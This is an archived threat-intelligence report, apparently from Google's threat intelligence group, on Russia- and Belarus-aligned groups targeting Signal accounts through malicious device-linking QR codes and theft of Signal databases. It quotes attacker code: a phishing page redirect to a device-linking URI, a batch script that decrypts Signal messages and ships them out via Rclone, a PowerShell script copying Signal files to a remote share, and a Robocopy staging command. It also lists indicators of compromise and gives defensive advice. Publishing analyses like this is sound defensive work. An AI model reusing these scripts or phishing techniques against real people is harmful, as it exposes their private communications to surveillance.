{ "id": "bb7970f3-7b90-443b-8245-bcee2ca71695", "created_at": "2026-04-06T01:32:03.599607Z", "updated_at": "2026-04-10T03:37:09.246182Z", "deleted_at": null, "sha1_hash": "6dafa509fd5d2c83cd3a79a73e2ae8d499983db8", "title": "Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 500874, "plain_text": "Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively\r\nTargeting Signal Messenger\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-02-19 · Archived: 2026-04-06 00:59:05 UTC\r\nWritten by: Dan Black\r\nGoogle Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat\r\nactors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services.\r\nWhile this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive\r\ngovernment and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the\r\ntactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional\r\nthreat actors and regions outside the Ukrainian theater of war.\r\nSignal's popularity among common targets of surveillance and espionage activity—such as military personnel,\r\npoliticians, journalists, activists, and other at-risk communities—has positioned the secure messaging application\r\nas a high-value target for adversaries seeking to intercept sensitive information that could fulfill a range of\r\ndifferent intelligence requirements. More broadly, this threat also extends to other popular messaging applications\r\nsuch as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using\r\nsimilar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a\r\npublic warning regarding the tactics and methods used to date to help build public awareness and help\r\ncommunities better safeguard themselves from similar threats.\r\nWe are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal\r\nreleases on Android and iOS contain hardened features designed to help protect against similar phishing\r\ncampaigns in the future. Update to the latest version to enable these features.\r\nPhishing Campaigns Abusing Signal's \"Linked Devices\" Feature\r\nThe most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts\r\nis the abuse of the app's legitimate \"linked devices\" feature that enables Signal to be used on multiple devices\r\nconcurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat\r\nactors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and\r\nthe threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations\r\nwithout the need for full-device compromise.\r\nIn remote phishing operations observed to date, malicious QR codes have frequently been masked as\r\nlegitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing\r\ninstructions from the Signal website.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 1 of 11\n\nIn more tailored remote phishing operations, malicious device-linking QR codes have been embedded in\r\nphishing pages crafted to appear as specialized applications used by the Ukrainian military.\r\nBeyond remote phishing and malware delivery operations, we have also seen malicious QR codes being\r\nused in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by\r\nmultiple governments to the Main Centre for Special Technologies (GTsST) within Main Directorate of the\r\nGeneral Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has\r\nworked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on\r\nthe battlefield back to actor-controlled infrastructure for follow-on exploitation.\r\nNotably, this device-linking concept of operations has proven to be a low-signature form of initial access due to\r\nthe lack of centralized, technology-driven detections and defenses that can be used to monitor for account\r\ncompromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed\r\nfor extended periods of time.\r\nUNC5792: Modified Signal Group Invites\r\nTo compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked\r\nas UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate \"group invite\" pages\r\nfor delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a\r\nmalicious URL crafted to link an actor-controlled device to the victim's Signal account.\r\nIn these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled\r\ninfrastructure designed to appear identical to a legitimate Signal group invite.\r\nIn each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has\r\nbeen replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to\r\nlink a new device to Signal (i.e., \"sgnl://linkdevice?uuid=\"), tricking victims into linking their Signal\r\naccounts to a device controlled by UNC5792.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 2 of 11\n\nFigure 1: Example modified Signal group invite hosted on UNC5792-controlled domain \"signal-groups[.]tech\"\r\nfunction doRedirect() {\r\nif (window.location.hash) {\r\nvar redirect = \"sgnl://signal.group/\" + window.location.hash\r\ndocument.getElementById('go-to-group').href = redirect\r\nwindow.location = redirect\r\n} else {\r\ndocument.getElementById('join-button').innerHTML = \"No group found.\"\r\nwindow.onload = doRedirect\r\nFigure 2: Typical legitimate group invite code for redirection to a Signal group\r\nfunction doRedirect() {\r\nvar redirect = 'sgnl://linkdevice\r\nuuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D\r\npub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'\r\n//redirect=encodeURIComponent(redirect)\r\ndocument.getElementById('go-to-group').href = redirect\r\nwindow.location = redirect\r\nwindow.onload = doRedirect\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 3 of 11\n\nFigure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled\r\nSignal instance\r\nUNC4221: Custom-Developed Signal Phishing Kit\r\nUNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively\r\ntargeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit\r\ndesigned to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery\r\nguidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its\r\ndevice-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this\r\nphishing kit have been observed, including:\r\nPhishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate\r\ndevice-linking instructions provisioned by Signal (Figure 4)\r\nPhishing websites with the malicious device-linking QR code directly embedded into the primary\r\nKropyva-themed phishing kit (Figure 5)\r\nIn earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert\r\nfrom Signal (Figure 6)\r\nFigure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain \"signal-confirm[.]site\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 4 of 11\n\nFigure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at \"teneta.add-group[.]site\". The page invites the user to \"Sign in to Signal\" (Ukrainian: \"Авторизуватись у Signal\"), which in\r\nturn displays a QR code linked to an UNC4221-controlled Signal instance.\r\nFigure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host\r\nNotably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload\r\ntracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API.\r\nIn general, we expect to see secure messages and location data to frequently feature as joint targets in future\r\noperations of this nature, particularly in the context of targeted surveillance operations or support to conventional\r\nmilitary operations.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 5 of 11\n\nWider Russian and Belarusian Efforts to Steal Messages From Signal\r\nBeyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and\r\nestablished regional threat actors have also been observed operating capabilities designed to steal Signal database\r\nfiles from Android and Windows devices.\r\nAPT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically\r\nquery Signal messages from a victim's Signal database and exfiltrate those most recent messages using\r\nRclone (Figure 7).\r\nAs reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security\r\nCentre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective\r\norganizations to Sandworm, is designed to recursively search for a list of file extensions including the local\r\ndatabase for a series of messaging applications, including Signal, on Android devices.\r\nTurla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the\r\nFederal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell\r\nscript in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).\r\nExtending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage\r\nthe contents of file directories used by Signal Desktop to store messages and attachments for later\r\nexfiltration (Figure 9).\r\nif %proflag%==1 (\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n copy /y %new% C:\\ProgramData\\Signal\\Storage\\Signal\\sqlorig\\db.sqlite\r\n C:\\ProgramData\\Signal\\Storage\\rc.exe copy -P -I --log-file=C:\\ProgramData\\Signal\\Storage\\rclog.txt --log-lev\r\n del C:\\ProgramData\\Signal\\Storage\\Signal\\log*\r\n rmdir /s /q C:\\ProgramData\\Signal\\Storage\\sql\r\n move C:\\ProgramData\\Signal\\Storage\\Signal\\sql C:\\ProgramData\\Signal\\Storage\\sql\r\n) ELSE (\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %old% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %old% \"PRAGMA key=\"\"x'%key%'\"\";select count(*) from sqlite_maste\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";select count(*) from sqlite_maste\r\n C:\\ProgramData\\Signal\\Storage\\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% \u003e %diff_name%\r\n del /s %old_dec% %new_dec%\r\n rmdir /s /q C:\\ProgramData\\Signal\\Storage\\sql\r\n move C:\\ProgramData\\Signal\\Storage\\Signal\\sql C:\\ProgramData\\Signal\\Storage\\sql\r\n powershell -Command \"move C:\\ProgramData\\Signal\\Storage\\log.tmp C:\\ProgramData\\Signal\\Storage\\Signal\\log$(Ge\r\n)\r\nFigure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 6 of 11\n\n$TempPath = $env:tmp\r\n$TempPath = $env:temp\r\n$ComputerName = $env:computername\r\n$DFSRoot = \"\\\\redacted\"\r\n$RRoot = $DFSRoot + \"resource\\\"\r\n$frand = Get-Random -Minimum 1 -Maximum 10000\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\sql\\db.sqlite\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\sql\\db.sqlite\" | Out-File $treslocal -Append\r\n$file1 = $ComputerName + \"_\" + $frand + \"sig.zip\"\r\n$zipfile = $TempPath + \"\\\" + $file1\r\n$resfile = $RRoot + $file1\r\nCompress-Archive -Path \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" -DestinationPath $zipfile\r\nCopy-Item -Path $zipfile -Destination $resfile -Force\r\nRemove-Item -Path $zipfile -Force\r\nFigure 8: PowerShell script used by Turla to exfiltrate Signal messages\r\nC:\\Windows\\system32\\cmd.exe /C cd %appdata% \u0026\u0026 robocopy\r\n\"%userprofile%\\AppData\\Roaming\\Signal\" C:\\Users\\Public\\data\\signa /S\r\nFigure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration\r\nOutlook and Implications\r\nThe operational emphasis on Signal from multiple threat actors in recent months serves as an important warning\r\nfor the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in\r\na wider context with other trends in the threat landscape, such as the growing commercial spyware industry and\r\nthe surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and\r\ngrowing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of\r\nindividuals who rely on secure messaging applications to safeguard their online activity.\r\nAs reflected in wide ranging efforts to compromise Signal accounts, this threat to secure messaging applications is\r\nnot limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this\r\nthreat is not only limited to Signal, but also extends to other widely used messaging platforms, including\r\nWhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 7 of 11\n\naforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see\r\nMicrosoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign\r\nattempting to abuse the linked device feature to compromise WhatsApp accounts.  \r\nPotential targets of government-backed intrusion activity targeting their personal devices should adopt practices to\r\nhelp safeguard themselves, including:\r\nEnable screen lock on all mobile devices using a long, complex password with a mix of uppercase and\r\nlowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer\r\nsignificantly more security than numeric-only PINs or patterns.\r\nInstall operating system updates as soon as possible and always use the latest version of Signal and other\r\nmessaging apps.\r\nEnsure Google Play Protect is enabled, which is on by default on Android devices with Google Play\r\nServices. Google Play Protect checks your apps and devices for harmful behavior and can warn users or\r\nblock apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.\r\nAudit linked devices regularly for unauthorized devices by navigating to the \"Linked devices\" section in\r\nthe application's settings.\r\nExercise caution when interacting with QR codes and web resources purporting to be software updates,\r\ngroup invites, or other notifications that appear legitimate and urge immediate action.\r\nIf available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.\r\niPhone users concerned about targeted surveillance or espionage activity should consider enabling\r\nLockdown Mode to reduce their attack surface.\r\nIndicators of Compromise\r\nTo assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of\r\ncompromise (IOCs) in a GTI Collection for registered users.\r\nSee Table 1 for a sample of relevant indicators of compromise.\r\nActor Indicator of Compromise Context \r\nUNC5792 e078778b62796bab2d7ab2b04d6b01bf Example of altered group invite HTML code \r\nadd-signal-group[.]com\r\nadd-signal-groups[.]com\r\nFake group invite phishing pages\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 8 of 11\n\ngroup-signal[.]com\r\ngroups-signal[.]site\r\nsignal-device-off[.]online\r\nsignal-group-add[.]com\r\nsignal-group[.]site\r\nsignal-group[.]tech\r\nsignal-groups-add[.]com\r\nsignal-groups[.]site\r\nsignal-groups[.]tech\r\nsignal-security[.]online\r\nsignal-security[.]site\r\nsignalgroup[.]site\r\nsignals-group[.]com\r\nUNC4221\r\nsignal-confirm[.]site\r\nconfirm-signal[.]site\r\nDevice-linking instructions phishing page\r\nsignal-protect[.]host Fake Signal security alert \r\nteneta.join-group[.]online\r\nteneta.add-group[.]site\r\ngroup-teneta[.]online\r\nhelperanalytics[.]ru\r\ngroup-teneta[.]online\r\nteneta[.]group\r\ngroup.kropyva[.]site\r\nFake Kropyva group invites \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 9 of 11\n\nAPT44\r\n150.107.31[.]194:18000\r\nDynamically generated device-linking QR code\r\nprovisioned by APT44\r\na97a28276e4f88134561d938f60db495\r\nb379d8f583112cad3cf60f95ab3a67fd\r\nb27ff24870d93d651ee1d8e06276fa98\r\nWAVESIGN batch scripts \r\nTable 1: Relevant indicators of compromise\r\nSee Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned\r\nthreat actors to target Signal messages.\r\nThreat\r\nActor \r\nTactic  Technique\r\nUNC5792 Linked device\r\nRemote phishing operations using fake group invites to pair a victim's\r\nSignal messages to an actor-controlled device\r\nUNC4221 Linked device\r\nRemote phishing operations using fake military web applications and\r\nsecurity alerts to pair a victim's Signal messages to an actor-controlled\r\ndevice\r\nAPT44\r\nLinked device\r\nClose-access physical device exploitation to pair a victim's Signal\r\nmessages to an actor-controlled device\r\nSignal Android\r\ndatabase theft\r\nAndroid malware (Infamous Chisel) tailored to exfiltrate Signal\r\ndatabase files\r\nSignal Desktop\r\ndatabase theft \r\nWindows Batch script tailored to periodically exfiltrate recent Signal\r\nmessages via Rclone\r\nTurla\r\nSignal Desktop\r\ndatabase theft \r\nPost-compromise activity in Windows environments\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 10 of 11\n\nUNC1151\r\nSignal Desktop\r\ndatabase theft \r\nUse of Robocopy to stage Signal Desktop file directories for exfiltration\r\nTable 2: Summary of observed threat activity targeting Signal messages\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger" ], "report_names": [ "russia-targeting-signal-messenger" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "f29188d8-2750-4099-9199-09a516c58314", "created_at": "2025-08-07T02:03:25.068489Z", "updated_at": "2026-04-10T02:00:03.827361Z", "deleted_at": null, "main_name": "MOONSCAPE", "aliases": [ "TA445 ", "UAC-0051 ", "UNC1151 " ], "source_name": "Secureworks:MOONSCAPE", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4", "created_at": "2023-01-06T13:46:38.581534Z", "updated_at": "2026-04-10T02:00:03.029872Z", "deleted_at": null, "main_name": "Callisto", "aliases": [ "BlueCharlie", "Star Blizzard", "TAG-53", "Blue Callisto", "TA446", "IRON FRONTIER", "UNC4057", "COLDRIVER", "SEABORGIUM", "GOSSAMER BEAR" ], "source_name": "MISPGALAXY:Callisto", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "119c8bea-816e-4799-942b-ff375026671e", "created_at": "2022-10-25T16:07:23.957309Z", "updated_at": "2026-04-10T02:00:04.807212Z", "deleted_at": null, "main_name": "Operation Ghostwriter", "aliases": [ "DEV-0257", "Operation Asylum Ambuscade", "PUSHCHA", "Storm-0257", "TA445", "UAC-0051", "UAC-0057", "UNC1151", "White Lynx" ], "source_name": "ETDA:Operation Ghostwriter", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "HALFSHELL", "Impacket", "RADIOSTAR", "VIDEOKILLER", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aedca2f-6f6c-4470-af26-a46097d3eab5", "created_at": "2024-11-01T02:00:52.689773Z", "updated_at": "2026-04-10T02:00:05.396502Z", "deleted_at": null, "main_name": "Star Blizzard", "aliases": [ "Star Blizzard", "SEABORGIUM", "Callisto Group", "TA446", "COLDRIVER" ], "source_name": "MITRE:Star Blizzard", "tools": [ "Spica" ], "source_id": "MITRE", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "a7ff9823-17a0-4fcd-955e-ade8164bd827", "created_at": "2024-12-21T02:00:02.861322Z", "updated_at": "2026-04-10T02:00:03.7962Z", "deleted_at": null, "main_name": "UAC-0185", "aliases": [ "UNC4221" ], "source_name": "MISPGALAXY:UAC-0185", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73", "created_at": "2023-01-06T13:46:39.195689Z", "updated_at": "2026-04-10T02:00:03.243054Z", "deleted_at": null, "main_name": "Ghostwriter", "aliases": [ "UAC-0057", "UNC1151", "TA445", "PUSHCHA", "Storm-0257", "DEV-0257" ], "source_name": "MISPGALAXY:Ghostwriter", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "2d06d270-acfd-4db8-83a8-4ff68b9b1ada", "created_at": "2022-10-25T16:07:23.477794Z", "updated_at": "2026-04-10T02:00:04.625004Z", "deleted_at": null, "main_name": "Cold River", "aliases": [ "Blue Callisto", "BlueCharlie", "Calisto", "Cobalt Edgewater", "Gossamer Bear", "Grey Pro", "IRON FRONTIER", "Mythic Ursa", "Nahr Elbard", "Nahr el bared", "Seaborgium", "Star Blizzard", "TA446", "TAG-53", "UNC4057" ], "source_name": "ETDA:Cold River", "tools": [ "Agent Drable", "AgentDrable", "DNSpionage", "LOSTKEYS", "SPICA" ], "source_id": "ETDA", "reports": null }, { "id": "3a057a97-db21-4261-804b-4b071a03c124", "created_at": "2024-06-04T02:03:07.953282Z", "updated_at": "2026-04-10T02:00:03.813595Z", "deleted_at": null, "main_name": "IRON FRONTIER", "aliases": [ "Blue Callisto ", "BlueCharlie ", "CALISTO ", "COLDRIVER ", "Callisto Group ", "GOSSAMER BEAR ", "SEABORGIUM ", "Star Blizzard ", "TA446 " ], "source_name": "Secureworks:IRON FRONTIER", "tools": [ "Evilginx2", "Galileo RCS", "SPICA" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439123, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.pdf", "text": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.txt", "img": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.jpg" } }